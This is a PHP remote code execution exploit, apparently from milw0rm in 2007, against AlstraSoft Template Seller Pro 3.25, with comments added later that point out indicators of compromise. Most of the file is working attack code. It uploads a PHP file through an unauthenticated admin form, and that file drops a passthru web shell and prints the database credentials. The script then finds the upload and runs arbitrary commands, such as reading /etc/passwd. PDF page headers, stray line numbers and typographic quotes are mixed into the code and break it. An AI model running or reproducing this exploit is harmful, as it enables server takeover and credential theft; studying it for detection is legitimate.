#!/usr/bin/php −q −d short_open_tag=on
<?
// Public proof-of-concept (milw0rm, 2007) against AlstraSoft Template Seller
// Pro <= 3.25.  Invoked from the command line: host, application path, command.
// The "<?" short open tag below only parses because the shebang passes
// -d short_open_tag=on to the interpreter.
echo "
AlstraSoft Template Seller Pro <= 3.25 Remote Code Execution Exploit
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love

";
// Three positional arguments are mandatory (argv[0] is the script itself).
if ($argc<4) {
echo "Usage: php ".$argv[0]." Host Path CMD
Host:   target server (ip/hostname)
Path:   path of template
CMD:      A Shell Command

Example:
php ".$argv[0]." localhost /template/ cat /etc/passwd";

die;
}
error_reporting(0);                     // all warnings/notices are suppressed; failures go unreported
ini_set("max_execution_time",0);        // no script time limit
ini_set("default_socket_timeout",5);    // 5-second timeout for the fsockopen() streams used below
  23
  24   /*
  25     ___________________________________________________________________
  26   /        This script is part of the AlstraSoft Exploit Pack:          \
  27   |                                                                     |
  28   | http://itablackhawk.altervista.org/exploit/alsoft_exploit_pack; |
  29   |                                                                     |
  30   |             You can find the patches for this bugs at:              |
  31   |                                                                     |
  32   |    http://itablackhawk.altervista.org/download/alsoft_patch.zip     |
  33   |                                                                     |
  34   \________________________.:BlackHawk 2007:._________________________/
  35
  36   */
  37
  38   /*
  39   VULN EXPLANATION
  40
  41   Same problem as Vuln N.1, but with this one we can upload PHP files.
  42
  43   The Vulnerable script can be found in admin/addsptemplate.php
  44
  45
  46   */
  47
  48   function quick_dump($string)
  49   {
  50     $result=’’;$exa=’’;$cont=0;
  51     for ($i=0; $i<=strlen($string)−1; $i++)
  52     {
BlackHawk                                                                                  05/20/2007
                    AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit              Page 2/7
  53         if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  54         {$result.=" .";}
  55         else
  56         {$result.=" ".$string[$i];}
  57         if (strlen(dechex(ord($string[$i])))==2)
  58         {$exa.=" ".dechex(ord($string[$i]));}
  59         else
  60         {$exa.=" 0".dechex(ord($string[$i]));}
  61         $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  62       }
  63      return $exa."\r\n".$result;
  64    }
// Accepted shape for the optional HTTP proxy: "a.b.c.d:port".  The outer
// parentheses are the PCRE delimiters, not a capture group; octets and the
// port are only checked for digit count, not for range.
$proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
// Sends one raw HTTP request ($packet) over plain TCP and leaves the whole
// response in the global $html.  Everything else comes from globals:
//   $host/$port   target, used for a direct connection when $proxy is empty
//   $proxy        optional "ip:port" HTTP proxy, validated with $proxy_regex
//   $proxy_regex  the validation pattern
// There is no TLS support; any failure to connect ends the script with die.
function sendpacketii($packet)
{
   global $proxy, $host, $port, $html, $proxy_regex;
   if ($proxy==’’) {
      // direct mode: resolve the name first, then connect
      $ock=fsockopen(gethostbyname($host),$port);
      if (!$ock) {
        echo ’No response from ’.$host.’:’.$port; die;
      }
   }
   else {
      // proxy mode: the proxy string must match $proxy_regex before it is split
      $c = preg_match($proxy_regex,$proxy);
      if (!$c) {
        echo ’Not a valid proxy...’;die;
      }
      $parts=explode(’:’,$proxy);
      echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
      $ock=fsockopen($parts[0],$parts[1]);
      if (!$ock) {
        echo ’No response from proxy...’;die;
      }
   }
   fputs($ock,$packet);
   if ($proxy==’’) {
      // direct mode: read line by line until the server closes the socket
      $html=’’;
      while (!feof($ock)) {
        $html.=fgets($ock);
      }
   }
   else {
      // proxy mode: read one byte at a time.  Because the two conditions are
      // joined with "or", the loop ends only once the socket is at EOF *and*
      // a CRLF CRLF sequence has been seen in the data; if the peer closes
      // without ever sending that blank line the loop does not terminate.
      // eregi() was removed in PHP 7.0.
      $html=’’;
      while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
        $html.=fread($ock,1);
      }
   }
   fclose($ock);
}
  102
// --- Argument handling -----------------------------------------------------
$host=$argv[1];
$path=$argv[2];

// Everything from argv[3] onwards is joined (space-separated) into one command.
$cmd="";
for ($i=3; $i<=$argc−1; $i++){
$cmd.=" ".$argv[$i];
}
$port=80;    // hard-coded: plain HTTP on port 80 only
$proxy="";   // left empty, so sendpacketii() always takes its direct-connection branch

$cmd=urlencode($cmd);
// $path must start and end with "/" (e.g. /template/); "<>" is PHP's "!=".
if (($path[0]<>’/’) or ($path[strlen($path)−1]<>’/’)) {echo ’Error... check the path!’; die;}
// Request-target prefix: the bare path when direct, an absolute URL when proxied.
if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
  116
echo "− Uploading Shell Creator..\r\n";
// Raw bytes of a tiny JPEG: it opens with the SOI/APP0 "JFIF" markers
// (FF D8 FF E0 ... 4A 46 49 46), contains an "Exif" APP1 segment and ends
// with EOI (FF D9).  It is later sent as the "fpi" image field of the upload
// form under the fixed filename daforno_imperat.jpeg — presumably so the
// server-side image handling accepts the submission (TODO confirm against
// admin/addsptemplate.php).  The thumbnail generated from it is what the
// script searches for afterwards to locate the upload directory.
$italy_rulez=
chr(0xff).chr(0xd8).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).
chr(0x00).chr(0x60).chr(0x00).chr(0x60).chr(0x00).chr(0x00).chr(0xff).
chr(0xe1).chr(0x00).chr(0x36).chr(0x45).chr(0x78).chr(0x69).chr(0x66).
chr(0x00).chr(0x00).chr(0x49).chr(0x49).chr(0x2a).chr(0x00).chr(0x08).
chr(0x00).chr(0x00).chr(0x00).chr(0x02).chr(0x00).chr(0x01).chr(0x03).
chr(0x05).chr(0x00).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x26).
chr(0x00).chr(0x00).chr(0x00).chr(0x03).chr(0x03).chr(0x01).chr(0x00).
chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x14).chr(0xc6).
chr(0xff).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xa0).chr(0x86).
chr(0x01).chr(0x00).chr(0x8f).chr(0xb1).chr(0x00).chr(0x00).chr(0xff).
chr(0xdb).chr(0x00).chr(0x43).chr(0x00).chr(0x08).chr(0x06).chr(0x06).
chr(0x07).chr(0x06).chr(0x05).chr(0x08).chr(0x07).chr(0x07).chr(0x07).
chr(0x09).chr(0x09).chr(0x08).chr(0x0a).chr(0x0c).chr(0x14).chr(0x0d).
chr(0x0c).chr(0x0b).chr(0x0b).chr(0x0c).chr(0x19).chr(0x12).chr(0x13).
chr(0x0f).chr(0x14).chr(0x1d).chr(0x1a).chr(0x1f).chr(0x1e).chr(0x1d).
chr(0x1a).chr(0x1c).chr(0x1c).chr(0x20).chr(0x24).chr(0x2e).chr(0x27).
chr(0x20).chr(0x22).chr(0x2c).chr(0x23).chr(0x1c).chr(0x1c).chr(0x28).
chr(0x37).chr(0x29).chr(0x2c).chr(0x30).chr(0x31).chr(0x34).chr(0x34).
chr(0x34).chr(0x1f).chr(0x27).chr(0x39).chr(0x3d).chr(0x38).chr(0x32).
chr(0x3c).chr(0x2e).chr(0x33).chr(0x34).chr(0x32).chr(0xff).chr(0xdb).
chr(0x00).chr(0x43).chr(0x01).chr(0x09).chr(0x09).chr(0x09).chr(0x0c).
chr(0x0b).chr(0x0c).chr(0x18).chr(0x0d).chr(0x0d).chr(0x18).chr(0x32).
chr(0x21).chr(0x1c).chr(0x21).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0xff).chr(0xc0).chr(0x00).
chr(0x11).chr(0x08).chr(0x00).chr(0x14).chr(0x00).chr(0x1e).chr(0x03).
chr(0x01).chr(0x22).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x00).
chr(0x00).chr(0x01).chr(0x05).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).
chr(0x05).chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).
chr(0xff).chr(0xc4).chr(0x00).chr(0xb5).chr(0x10).chr(0x00).chr(0x02).
chr(0x01).chr(0x03).chr(0x03).chr(0x02).chr(0x04).chr(0x03).chr(0x05).
chr(0x05).chr(0x04).chr(0x04).chr(0x00).chr(0x00).chr(0x01).chr(0x7d).
chr(0x01).chr(0x02).chr(0x03).chr(0x00).chr(0x04).chr(0x11).chr(0x05).
chr(0x12).chr(0x21).chr(0x31).chr(0x41).chr(0x06).chr(0x13).chr(0x51).
chr(0x61).chr(0x07).chr(0x22).chr(0x71).chr(0x14).chr(0x32).chr(0x81).
chr(0x91).chr(0xa1).chr(0x08).chr(0x23).chr(0x42).chr(0xb1).chr(0xc1).
chr(0x15).chr(0x52).chr(0xd1).chr(0xf0).chr(0x24).chr(0x33).chr(0x62).
chr(0x72).chr(0x82).chr(0x09).chr(0x0a).chr(0x16).chr(0x17).chr(0x18).
chr(0x19).chr(0x1a).chr(0x25).chr(0x26).chr(0x27).chr(0x28).chr(0x29).
chr(0x2a).chr(0x34).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x83).chr(0x84).
chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).chr(0x92).
chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).chr(0x99).
chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).chr(0xa7).
chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).chr(0xb5).
chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).chr(0xc3).
chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).chr(0xca).
chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).chr(0xd8).
chr(0xd9).chr(0xda).chr(0xe1).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf1).chr(0xf2).
chr(0xf3).chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).
chr(0xfa).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x01).chr(0x00).
chr(0x03).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).chr(0x05).
chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).chr(0xff).
chr(0xc4).chr(0x00).chr(0xb5).chr(0x11).chr(0x00).chr(0x02).chr(0x01).
chr(0x02).chr(0x04).chr(0x04).chr(0x03).chr(0x04).chr(0x07).chr(0x05).
chr(0x04).chr(0x04).chr(0x00).chr(0x01).chr(0x02).chr(0x77).chr(0x00).
chr(0x01).chr(0x02).chr(0x03).chr(0x11).chr(0x04).chr(0x05).chr(0x21).
chr(0x31).chr(0x06).chr(0x12).chr(0x41).chr(0x51).chr(0x07).chr(0x61).
chr(0x71).chr(0x13).chr(0x22).chr(0x32).chr(0x81).chr(0x08).chr(0x14).
chr(0x42).chr(0x91).chr(0xa1).chr(0xb1).chr(0xc1).chr(0x09).chr(0x23).
chr(0x33).chr(0x52).chr(0xf0).chr(0x15).chr(0x62).chr(0x72).chr(0xd1).
chr(0x0a).chr(0x16).chr(0x24).chr(0x34).chr(0xe1).chr(0x25).chr(0xf1).
chr(0x17).chr(0x18).chr(0x19).chr(0x1a).chr(0x26).chr(0x27).chr(0x28).
chr(0x29).chr(0x2a).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x82).chr(0x83).
chr(0x84).chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).
chr(0x92).chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).
chr(0x99).chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).
chr(0xa7).chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).
chr(0xb5).chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).
chr(0xc3).chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).
chr(0xca).chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).
chr(0xd8).chr(0xd9).chr(0xda).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf2).chr(0xf3).
chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).chr(0xfa).
chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).chr(0x00).
chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).
chr(0xd6).chr(0xaf).chr(0x4f).chr(0xf0).chr(0x97).chr(0xfc).chr(0x8b).
chr(0x16).chr(0x7f).chr(0xf0).chr(0x3f).chr(0xfd).chr(0x0d).chr(0xab).
chr(0xcc).chr(0x2b).chr(0xd3).chr(0xfc).chr(0x25).chr(0xff).chr(0x00).
chr(0x22).chr(0xc5).chr(0x9f).chr(0xfc).chr(0x0f).chr(0xff).chr(0x00).
chr(0x43).chr(0x6a).chr(0xf9).chr(0x0c).chr(0x83).chr(0xfd).chr(0xe6).
chr(0x5f).chr(0xe1).chr(0x7f).chr(0x9a).chr(0x3e).chr(0x13).chr(0x85).
chr(0xff).chr(0x00).chr(0xdf).chr(0x25).chr(0xfe).chr(0x17).chr(0xf9).
chr(0xa3).chr(0x80).chr(0xf8).chr(0xd9).chr(0xff).chr(0x00).chr(0x30).
chr(0x3f).chr(0xfb).chr(0x78).chr(0xff).chr(0x00).chr(0xda).chr(0x75).
chr(0xe4).chr(0xb5).chr(0xeb).chr(0x5f).chr(0x1b).chr(0x3f).chr(0xe6).
chr(0x07).chr(0xff).chr(0x00).chr(0x6f).chr(0x1f).chr(0xfb).chr(0x4e).
chr(0xbc).chr(0x96).chr(0xbd).chr(0x2c).chr(0x67).chr(0xf1).chr(0xe5).
chr(0xf2).chr(0xfc).chr(0x8f).chr(0xe9).chr(0x0e).chr(0x1b).chr(0xff).
chr(0x00).chr(0x91).chr(0x5d).chr(0x2f).chr(0xfb).chr(0x7b).chr(0xff).
chr(0x00).chr(0x4a).chr(0x67).chr(0xa5).chr(0x57).chr(0xa7).chr(0xf8).
chr(0x4b).chr(0xfe).chr(0x45).chr(0x8b).chr(0x3f).chr(0xf8).chr(0x1f).
chr(0xfe).chr(0x86).chr(0xd4).chr(0x51).chr(0x5e).chr(0x6e).chr(0x41).
chr(0xfe).chr(0xf3).chr(0x2f).chr(0xf0).chr(0xbf).chr(0xcd).chr(0x1f).
chr(0xcd).chr(0xfc).chr(0x2f).chr(0xfe).chr(0xf9).chr(0x2f).chr(0xf0).
chr(0xbf).chr(0xcd).chr(0x1c).chr(0x07).chr(0xc6).chr(0xcf).chr(0xf9).
chr(0x81).chr(0xff).chr(0x00).chr(0xdb).chr(0xc7).chr(0xfe).chr(0xd3).
chr(0xaf).chr(0x25).chr(0xa2).chr(0x8a).chr(0xf4).chr(0xb1).chr(0x9f).
chr(0xc7).chr(0x97).chr(0xcb).chr(0xf2).chr(0x3f).chr(0xa4).chr(0x38).
chr(0x6f).chr(0xfe).chr(0x45).chr(0x74).chr(0xbf).chr(0xed).chr(0xef).
chr(0xfd).chr(0x29).chr(0x9f).chr(0xff).chr(0xd9);
// --- Step 1: multipart/form-data POST to admin/addsptemplate.php -------------
// The "zip" field carries a PHP source file (piggy_marty_creator.php) rather
// than an archive; the other fields mimic the template-submission form and
// "fpi" carries the JPEG bytes from $italy_rulez.  Fixed strings visible in
// this request that a log search or IDS rule can key on: the two file names,
// the boundary 7d529a1d23092a, the fake CLIENT-IP header and the "it"
// Accept-Language with an MSIE 6.0 user agent.
$data="−−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a\r\n";
$data.="Content−Disposition: form−data; name=\"zip\"; filename=\"piggy_marty_creator.php\"\r\n";
$data.="Content−Type:\r\n\r\n";
// Contents of the uploaded file.  When the server later executes it, it
// (1) writes a second file, piggy_marty.php, that passes $_GET[cmd] to
// passthru() between two "666999" marker echoes, (2) chmods that file,
// (3) includes ../../include/common.php and echoes the database connection
// settings after the word "delimitator".  Both file names and both marker
// strings are therefore on-disk / in-response indicators of compromise.
$data.="<?php
\$fp=fopen(’piggy_marty.php’,’w’);
fputs(\$fp,’<?php error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
\$_GET[cmd]=stripslashes(\$_GET[cmd]);
}
echo 666999;
passthru(\$_GET[cmd]);
echo 666999;
?>’);
fclose(\$fp);
chmod(’piggy_marty.php’,777);
include ’../../include/common.php’;
echo ’delimitator’.\$db_server.’|’.\$db_user.’|’.\$db_password.’|’.\$db_database;
?>\r\n";
// Remaining form fields: addsubmit=1, type=2, category, sdes and the image
// part "fpi" (filename daforno_imperat.jpeg, Content-Type image/pjpeg).
$data.=’−−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
Content−Disposition: form−data; name="addsubmit"

1
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
Content−Disposition: form−data; name="type"

2
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
Content−Disposition: form−data; name="category"

Exploit And Similar
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
Content−Disposition: form−data; name="sdes"

4
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
Content−Disposition: form−data; name="fpi"; filename="daforno_imperat.jpeg";
Content−Type: image/pjpeg

’.$italy_rulez.’
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a−−
’;
// HTTP/1.0 request headers.  No authentication of any kind is sent, which is
// what makes the admin script reachable here (presumably — confirm against
// the application's access control).
$packet="POST ".$p."admin/addsptemplate.php HTTP/1.0\r\n";
$packet.="CLIENT−IP: 999.999.999.999\r\n";//spoof — not a valid IPv4 address; easy to flag in logs
$packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/example.html\r\n";   // same-site referer, built from the arguments
$packet.="Accept−Language: it\r\n";
$packet.="Content−Type: multipart/form−data; boundary=−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a\r\n";
$packet.="Accept−Encoding: gzip, deflate\r\n";
$packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content−Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache−Control: no−cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);    // response is left in the global $html (not inspected here)
  297
// --- Step 2: locate the directory the upload landed in ------------------------
echo "− Retrieving correct Path where the shell is located..\r\n";

// The public listing spusers/browse.php?browse=yes&show=all is fetched and
// searched for the thumbnail generated from the uploaded image; the directory
// component is captured in $oki[1].  Note that $data (the entire multipart
// body from step 1) is appended to this and to every following GET as well,
// without a Content-Length header — presumably a leftover of the request
// template.  A GET carrying a multipart body is itself an anomaly worth logging.
$packet ="GET ".$p."spusers/browse.php?browse=yes&show=all HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (preg_match("#/sptemplates/(.*?)/thumb_daforno_imperat.jpeg#is", $html, $oki))
{
// --- Step 3: request the uploaded PHP file so the server executes it ----------
// (it writes piggy_marty.php next to itself and prints the DB settings)
echo "− Creating the Shell & getting server credentials..\r\n";
$packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty_creator.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

sleep(3);
// Everything after the word "delimitator" in the response is the
// "server|user|password|database" tuple echoed by the uploaded file.
$temp=explode(’delimitator’,$html);
list($myserver,$myusername,$mypassword,$mydbname)=explode(’|’,$temp[1]);
echo "

−−− INFO FROM COMMON.PHP −−−

MySQL Server: $myserver
MySQL Username: $myusername
MySQL Password: $mypassword
MySQL Database: $mydbname

−−− END INFO −−−

";
// --- Step 4: call the dropped file with the url-encoded command ---------------
// Its output sits between the two "666999" markers in the response body.
echo "Step 5 − Execute Commands exist..\r\n";
$packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"666999"))
{
  echo "Exploit succeeded...\r\n";
  $temp=explode("666999",$html);
  die("\r\n".$temp[1]."\r\n");    // $temp[1] is the text between the markers
}

}
else
{
// the thumbnail path was not found in the listing, so the upload location is unknown
die (’Error: Can\’t retrieve Shell Path’);
}

# Coded With BH Fast Generator v0.1
?>
  350
  351   # milw0rm.com [2007−05−20]